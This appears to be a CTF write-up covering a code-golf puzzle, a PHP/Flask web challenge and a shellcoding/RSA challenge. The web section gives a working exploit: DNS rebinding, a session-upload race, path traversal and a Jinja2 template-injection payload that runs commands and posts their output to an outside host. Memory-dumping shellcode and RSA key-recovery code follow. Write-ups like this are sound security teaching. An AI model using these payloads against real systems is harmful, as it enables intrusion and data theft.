now looks up the parent of the current input node and appends that depth plus one to the accumulator before passing it to the nested function call. While this works cleanly in theory, in praxis the checker answers with: Runtime Error QQ
. Clearly I must have exceeded some limit… But which could it be? Running this list comprehension with a tree of the maximum specified size quickly yields the answer: RecursionError: maximum recursion depth exceeded in comparison
Thus I abandon all reason and followed a particularly twisted and evil thought: What if I just modify a variable during the list comprehension?
The creators of the list comprehension were clever. They thought of this. > They forbid the assignment operator for no men to treason from the pure and functional land into the realm of madness. A place of chaos where functions may output results based on their mood or delete the system when supplied the argument 6 the third time in a row. But their attempts were futile for I had created an abomination. A monster originally formed by intentions pure and functional, yet there was poison at its very heart. I utilized forgotten knowledge and forbidden sorcery to unearth the functional programmers most despised concept: functions that modify state.
To be precise I talk about the innocent looking function append
.
There was a second restriction that had to be circumvented. Namely lambda functions not being allowed to contain multiple statements. But I wanted to update the state and return a result, yet append
only does the first. From my earlier excursion to the stack overflow code golf tips I remembered one particular answer. Specifically the first comment of that answer: both list elements are evaluated. To have multiple statements in a lambda I just have to write them as a list and then access the element I want to return.
Together with the append
function I used to update the state of the variable a
during the list comprehension i came up with the following solution that only needed 147 out of the 300 allowed bytes:
[print(max([[f(e),a[i]][1]for n,h,*d in[map(int,open(0).read().split())]for a in[[0]]for f in[lambda e:a.append(a[e]+1)]for i,e in enumerate(d)]))]
But this was not good enough for me. I saw lots of potential thus I rewrote the function and created my final answer to this challenge:
[print(max([a.append(a[e]+1),a[e]+1][1]for a in[[0]]for e in map(int,open(0).read().split()[2:])))]
I realized that the lambda is not necessary any more, the enumerate is useless, and I can directly iterate over the input elements if I seed the accumulator with 0
and skip the first two numbers. Lastly, I removed the inner list comprehension as max also works with a generator. With these changes i finally solved the third challenge with 99 out of 300 allowed characters.
This web challenge (all source code given :)) consists of a PHP frontend and a Python + Flask backend.
index.php:
...
<?php
ini_set('default_socket_timeout', 1);
$waf = array("@","#","!","$","%","<", "*", "'", "&", "..", "localhost", "file", "gopher", "flag", "information_schema", "select", "from", "sleep", "user", "where", "union", ".php", "system", "access.log", "passwd", "cmdline", "exe", "fd", "meta-data");
$dst = @$_GET['🇰🇷🐟'];
if(!isset($dst)) exit("Forbidden");
$res = @parse_url($dst);
$ip = @dns_get_record($res['host'], DNS_A)[0]['ip'];
if($res['scheme'] !== 'http' && $res['scheme'] !== 'https') die("Error");
if(stripos($res['path'], "korea") === FALSE) die("Error");
for($i = 0; $i < count($waf); $i++)
if(stripos($dst, $waf[$i]) !== FALSE)
die("<svg/onload=\"alert('發大財!')\">".$waf[$i]);
sleep(1);
// u can only touch this useless ip :p
$dev_ip = "54.87.54.87";
if($ip === $dev_ip) {
$content = file_get_contents($dst);
echo $content;
}
The script is used to request URLs, but it is based on state-of-the art WAF technology to filter out malicious URLs and only allows queries to a certain (useless) IP.
But it’s visible that the DNS check (always uses the first A record) is separated from the IP used in the finaly access.
Additionally, the script contains a sleep(1)
which should allow us to return a different DNS record for the second request.
We also need to take care of the path checking, because we are only allowed to access URLs containg korea
in this part.
So we proceed with the analysis of the backend.
main.py:
...
def sanitize(str):
return str.replace(".", "").replace("{{", "")
...
@app.route('/error_page')
def error():
error_status = request.args.get("err")
err_temp_path = os.path.join('/var/www/flask/', 'error', error_status)
with open(err_temp_path, "r") as f:
content = f.read().strip()
return render_template_string(sanitize(content))
...
The script provides access to essential memes and contains two functions useful for exploiting the task. It can be seen that that the /error_page
route directly opens a file specified by the err
GET
parameter and renders it’s content with Jinja2. Jinja2 injection is a common topic within web challenges and together with the sanitize
it seemed to be the right way to solve the task.
Additionally, it should be noted that the script is also run as the www-data
user.
We can summarize our exploit plan:
sanitize
functionWe use our domain to set up a subdomain for an external DNS server:
t1ns 300 IN A 159.69.36.2
t1 300 IN NS t1ns.hxp.io.
The external DNS server then uses the following config:
'x.t1.hxp.io': [
Record(A, '54.87.54.87', ttl=0), # useless IP
Record(A, '159.69.36.2', ttl=0), # hxp.io IPv4
Record(AAAA, '2a01:4f8:1c1c:44b3::1', ttl=300), # hxp.io IPv6
]
It will always return the “useless” IP A record an attack IP together with a low ttl
.
This gives us the change to bypass the IP check, because of random ordering of DNS records.
If the first DNS request gets the “useless” and the second request the attack IP the frontend will be accessing our server.
Just in case, we also add our AAAA record if file_get_contents
uses IPv6.
You can find the full DNS server in the Appendix.
We create a helper PHP script to redirect the frontend to the the vulnerable /error_page
in the backend.
Additionally, this script will catch the extracted flag.
<?php
// run with php -S '[::]:5000' in ./koera/index.php
if($_SERVER['REQUEST_METHOD'] === 'POST') {
error_log(file_get_contents('php://input'));
exit();
}
header("Location: http://127.0.0.1:5000/error_page?err=../../../../var/lib/php/sessions/sess_please-play-hxp-36c3-CTF");
Finally, we craft an exploit script to execute the plan: We first race to create a session file with the crafted Jinja2 payload. Next, we try to bypass the IP check and render the hopefully uploaded payload.
#!/usr/bin/env python3
import requests, threading, base64
url = 'http://koreanfish4.balsnctf.com/'
# adapted (removed {{ and .) from https://github.com/epinna/tplmap/issues/46#issuecomment-401219988
eval_payload = base64.b64encode(b"""__import__("urllib.request").request.urlopen("http://hxp.io:5000/korea/",data=__import__("os").popen("/readflag;id").read().encode())""").decode()
payload = """{%set d="eval(getattr(__import__('base64'),'b64decode')('""" +eval_payload+ """'))"%}{%for c in []['__class__']['__base__']['__subclasses__']()%} {%if c['__name__'] == 'catch_warnings'%}{%for b in c['__init__']['__globals__']['values']()%}{%if b['__class__']=={}['__class__']%}{%if 'eval' in b['keys']() and b['eval'](d)%}{%endif%}{%endif%}{%endfor%}{%endif%}{%endfor%}"""
def pwn_worker():
""" injects payload into session """
files = {'file': b'A'*1_999_000}
while True:
r = requests.post(url, data={
'PHP_SESSION_UPLOAD_PROGRESS': payload
},
files=files, cookies={
'PHPSESSID': 'please-play-hxp-36c3-CTF',
},params={
"🇰🇷🐟":'http://x.t1.hxp.io/koreafish?id=1'
})
print('p', end='', flush=True)
def exec_worker():
""" try to execute the exploit """
while True:
r = requests.get(url,params={
"🇰🇷🐟":'http://x.t1.hxp.io:5000/korea/' # redirects to: http://127.0.0.1:5000/error_page?err=../../../../var/lib/php/sessions/sess_please-play-hxp-36c3-CTF
})
print('x', end='', flush=True)
if 'upload_progress_' in r.text:
print('!!! FLAG should be in the log !!!')
for _ in range(6):
threading.Thread(target=pwn_worker).start()
for _ in range(2):
threading.Thread(target=exec_worker).start()
Flag: Balsn{Korea_fish_is_good_to_eat!!!}
Minimal Python3 DNS server:
#!/usr/bin/env python3
# from https://gist.github.com/xero/65fc61e0bd8a4d4f267861cc3785e95b
from datetime import datetime
from time import sleep
from dnslib import DNSLabel, QTYPE, RD, RR
from dnslib import A, AAAA, CNAME, MX, NS, SOA, TXT
from dnslib.server import DNSServer
EPOCH = datetime(1970, 1, 1)
SERIAL = int((datetime.utcnow() - EPOCH).total_seconds())
TYPE_LOOKUP = {
A: QTYPE.A,
AAAA: QTYPE.AAAA,
CNAME: QTYPE.CNAME,
MX: QTYPE.MX,
NS: QTYPE.NS,
SOA: QTYPE.SOA,
TXT: QTYPE.TXT,
}
class Record:
def __init__(self, rdata_type, *args, rtype=None, rname=None, ttl=None, **kwargs):
if isinstance(rdata_type, RD):
# actually an instance, not a type
self._rtype = TYPE_LOOKUP[rdata_type.__class__]
rdata = rdata_type
else:
self._rtype = TYPE_LOOKUP[rdata_type]
if rdata_type == SOA and len(args) == 2:
# add sensible times to SOA
args += ((
SERIAL, # serial number
60 * 60 * 1, # refresh
60 * 60 * 3, # retry
60 * 60 * 24, # expire
60 * 60 * 1, # minimum
),)
rdata = rdata_type(*args)
if rtype:
self._rtype = rtype
self._rname = rname
self.kwargs = dict(
rdata=rdata,
ttl=self.sensible_ttl() if ttl is None else ttl,
**kwargs,
)
def try_rr(self, q):
if q.qtype == QTYPE.ANY or q.qtype == self._rtype:
return self.as_rr(q.qname)
def as_rr(self, alt_rname):
return RR(rname=self._rname or alt_rname, rtype=self._rtype, **self.kwargs)
def sensible_ttl(self):
if self._rtype in (QTYPE.NS, QTYPE.SOA):
return 60 * 60 * 24
else:
return 300
@property
def is_soa(self):
return self._rtype == QTYPE.SOA
def __str__(self):
return '{} {}'.format(QTYPE[self._rtype], self.kwargs)
ZONES = {
'x.t1.hxp.io': [
Record(A, '54.87.54.87',ttl=0),
Record(A, '159.69.36.2', ttl=0), # hxp.io IPv4
Record(AAAA, '2a01:4f8:1c1c:44b3::1', ttl=300), # hxp.io IPv6
]
}
class Resolver:
def __init__(self):
self.zones = {DNSLabel(k): v for k, v in ZONES.items()}
def resolve(self, request, handler):
reply = request.reply()
zone = self.zones.get(request.q.qname)
if zone is not None:
for zone_records in zone:
rr = zone_records.try_rr(request.q)
rr and reply.add_answer(rr)
else:
# no direct zone so look for an SOA record for a higher level zone
for zone_label, zone_records in self.zones.items():
if request.q.qname.matchSuffix(zone_label):
try:
soa_record = next(r for r in zone_records if r.is_soa)
except StopIteration:
continue
else:
reply.add_answer(soa_record.as_rr(zone_label))
break
return reply
resolver = Resolver()
servers = [
DNSServer(resolver, port=53, address='0.0.0.0', tcp=True),
DNSServer(resolver, port=53, address='0.0.0.0', tcp=False),
]
if __name__ == '__main__':
for s in servers:
s.start_thread()
try:
while 1:
sleep(0.1)
except KeyboardInterrupt:
pass
finally:
for s in servers:
s.stop()
As usual for a shellcoding challenge, we are given a binary that runs our (x86_64) shellcode in some sandbox, and the goal here is to extract some information: Specifically, we are given an RSA public key and ciphertext, and the binary that runs our shellcode first decrypts it using the corresponding private key — the (apparent) goal is to extract the private key, since we’re also given an encrypted flag file.
Obviously, the first idea is to find leftover pieces of the private key in memory and simply write()
them out to decrypt the flag. However, it’s not all that easy:
write()
and exit()
, so we can’t just get a shell or something.We discovered that the fourth word on the stack when our shellcode runs is a pointer to the heap, so we tried (variants of) the following shellcode:
_start:
pop rbx
pop rbx
pop rbx
pop rbx // points somewhere on heap
sub bh, 0x1c // move back a bit
0:
xor eax, eax
inc eax
mov edi, eax
push rbx
pop rsi
cdq
inc dh
add rbx, rdx // rbx_new = rbx_old + 0x100
syscall // write(1, rbx_old, 0x100)
jmp 0b
When running the binary locally on some machine with our own key and dumping some data from memory, we simply discovered one of the prime factors in the leakage, which inspired hope. However, this did not work on the target server and key, so it really depended on implementation specifics like the heap layout. Thus, we used the given Dockerfile
to reproduce the setup of the target machine, and after searching for various parts of the private key used for testing in the leakage, we found that a big chunk (but not all) of the RSA
It wasn’t hard to see using our own copy of the setup that the leaked data consisted of the lower
We wrote a sage
script to solve for the rest, first recovering guesses for the lower
#!/usr/bin/env sage
from Crypto.PublicKey import RSA
pub = RSA.importKey(open('home/pub.pem','rb').read())
n,e = pub.n, pub.e
d0 = int('-\xd3\xc0m\xb0\xa9q\x94\x19z\xe7 \xc2\x17\x86S|\xf1(\xfe\xba`\x9b\xd0.\xad<\xc0]\x9f\x866\x90\xbf\xa7\xb5m\xad\xa9\x13\xdd]c\xa5\xd2c\x91\xd3!x\xcerfQ'[::-1].encode('hex'),16)
nbits = floor(log(n,2)+1)
l = 54*8
l -= 7
R.<Y> = Zp(2, l+999)[]
p0s = set()
for k in range(1,e+1):
f = e*d0*Y - Y - k*(n*Y - Y**2 - n + Y)
zs = f.roots(multiplicities = False)
p0s |= {ZZ(z) % 2**l for z in zs}
R.<X> = Zmod(n)[]
ps = set()
for p0 in p0s:
f = 2**l*X + p0
f /= f.lc()
zs = f.small_roots(beta=.4, X=2**(nbits//2-l+7), delta=.999)
for z in zs:
p = 2**l*z + p0
ps.add(p)
p,q = ps
d = ZZ(Mod(e, (p-1)*(q-1))**-1)
cipher = int(open('home/flag.enc').read().encode('hex'),16)
plain = ZZ(pow(cipher, d, n))
flag = '{:0256x}'.format(plain).decode('hex').lstrip('\0')
print('--> \x1b[32m{}\x1b[0m'.format(flag))
Running this script takes a few seconds and then simply prints the flag:
--> Balsn{3a11_0ff1cia1_ap1_tO__fr3e__a3teR_d3crYpt1on...}